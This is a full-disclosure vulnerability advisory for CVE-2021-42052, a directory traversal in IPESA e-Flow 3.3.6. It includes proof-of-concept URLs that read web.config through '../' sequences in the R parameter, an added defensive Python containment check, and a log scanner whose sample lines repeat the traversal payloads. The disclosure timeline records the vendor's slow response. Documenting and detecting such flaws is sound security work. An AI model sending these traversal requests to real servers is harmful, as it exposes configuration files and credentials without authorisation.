Vulnerability Details
IPESA e-Flow 3.3.6 allows path traversal for reading any file within the web root directory via the lib/js/build/STEResource.res R parameter.
------------------------------------------
[Vulnerability Type]
Directory Traversal
------------------------------------------
[Vendor of Product]
IPESA
------------------------------------------
[Affected Product Code Base]
e-Flow - v.3.3.6
------------------------------------------
[Affected Component]
/lib/js/build/STEResource.res
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Basic path traversal sequence in the 'R' query parameter
------------------------------------------
[Discoverer]
nxnjz
------------------------------------------
[Reference]
https://ipesa.com/seccion/gestiondecolaseflow.html
Proof of Concept
https://example.tld/STE/lib/js/build/STEResource.res?R=../../../../../web.config
https://example.tld/lib/js/build/STEResource.res?R=../../../../../web.config
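The two request shapes above both rely on the R parameter being joined onto the resource directory without a containment check. The block below is an added example, not code from IPESA, from e-Flow, or from the advisory author. It shows the check a resource handler should apply before serving a file named by a query parameter (resolve the path, then verify it is still inside the directory it is meant to serve from), and a small scanner that applies the same check to web-server access-log lines to surface requests against the affected component. The resource directory (/srv/www/STE/lib/js/build), the combined-log line format, the sample log lines and the benign file name app.js are constructed assumptions for the demonstration; the affected path and the traversal sequence are taken from the advisory.

```python
"""Containment check and log scanner for the STEResource.res R-parameter traversal.

Added example; not the vendor's code. Assumptions (not from the advisory):
the resource directory path, the combined-log line format and the sample lines.
"""
import posixpath
from urllib.parse import parse_qs, urlsplit

AFFECTED_PATH = "/lib/js/build/STEResource.res"      # affected component (from the advisory)
RESOURCE_DIR = "/srv/www/STE/lib/js/build"           # assumed directory the handler should serve from


def resolve_within_root(base_dir: str, requested: str):
    """Return the normalized path of `requested` under `base_dir`, or None when the
    resolved path would leave the directory (a traversal attempt).

    `requested` is the already URL-decoded parameter value, exactly as the
    framework hands it to the handler; no second decode is done here so the check
    sees the same string the file system will see.
    """
    root = posixpath.normpath(base_dir)
    # Treat backslashes as separators (IIS/Windows hosts, as web.config suggests)
    # and strip a leading slash so the value cannot be taken as an absolute path.
    rel = requested.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, rel))
    # Only files strictly inside the directory are acceptable; the directory
    # itself (empty R) and anything reached via '..' above it are rejected.
    if candidate.startswith(root + "/"):
        return candidate
    return None


def find_traversal_requests(log_lines):
    """Scan combined-log-style lines and return (client_ip, decoded R value) for
    requests to the affected component whose R parameter escapes RESOURCE_DIR.

    parse_qs() performs the single URL decode, so '..%2F..%2F' and '../../' are
    judged identically, matching what a server would do before hitting the disk.
    """
    hits = []
    for line in log_lines:
        quoted = line.split('"')
        if len(quoted) < 2:
            continue                                 # not a request line we understand
        request_fields = quoted[1].split(" ")        # 'GET <target> HTTP/1.1'
        if len(request_fields) < 2:
            continue
        url = urlsplit(request_fields[1])
        if not url.path.endswith(AFFECTED_PATH):
            continue
        client_ip = line.split(" ")[0]
        for r_value in parse_qs(url.query, keep_blank_values=True).get("R", []):
            if resolve_within_root(RESOURCE_DIR, r_value) is None:
                hits.append((client_ip, r_value))
    return hits


# Constructed sample log lines (not real traffic); the two traversal requests
# mirror the proof-of-concept URLs in the advisory, one of them percent-encoded.
SAMPLE_LOG = [
    '203.0.113.7 - - [31/May/2021:10:00:01 +0000] "GET /STE/lib/js/build/STEResource.res?R=app.js HTTP/1.1" 200 512',
    '203.0.113.7 - - [31/May/2021:10:00:02 +0000] "GET /STE/lib/js/build/STEResource.res?R=../../../../../web.config HTTP/1.1" 200 2048',
    '198.51.100.4 - - [31/May/2021:10:00:03 +0000] "GET /lib/js/build/STEResource.res?R=..%2F..%2F..%2F..%2F..%2Fweb.config HTTP/1.1" 200 2048',
    '198.51.100.4 - - [31/May/2021:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, r in find_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: R={r!r}")
```

The scanner only flags a request when the resolved path actually leaves the resource directory, so ordinary values such as `sub/../app.js` are not reported; a 200 status on a flagged line is the signal that the file was served and the host should be treated as exposed.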
Timeline
- May 31, 2021: Vulnerability discovered and reported to a bug bounty program.
- August 4, 2021: Bug bounty program resolved the issue on their affected site.
- October 6, 2021: Contacted e-Flow vendor via website form, no response.
- October 7, 2021: CVE-2021-42052 reserved.
- October 26, 2021: Contacted the vendor via their Whois registrant email address, no response.
- October 26-29, 2021: Contacted the vendor via their WhatsApp customer service. They forwarded the issue.
- November 11, 2021: Received a request for vulnerability details from the vendor.
- November 11, 2021: Sent the requested info, and asked for an estimated time to resolution, no response.
- February 21, 2022: Asked the vendor for an update, no response.
- August 8, 2022: Publishing full disclosure.